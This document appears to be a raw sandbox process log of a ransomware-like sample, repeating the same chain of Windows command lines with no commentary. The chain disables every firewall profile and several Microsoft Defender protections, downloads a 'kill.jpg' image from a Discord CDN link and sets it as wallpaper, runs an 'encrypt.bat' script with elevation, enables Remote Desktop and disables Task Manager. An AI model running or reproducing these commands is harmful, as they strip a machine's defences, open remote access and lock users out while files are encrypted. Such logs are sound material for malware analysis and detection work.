netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

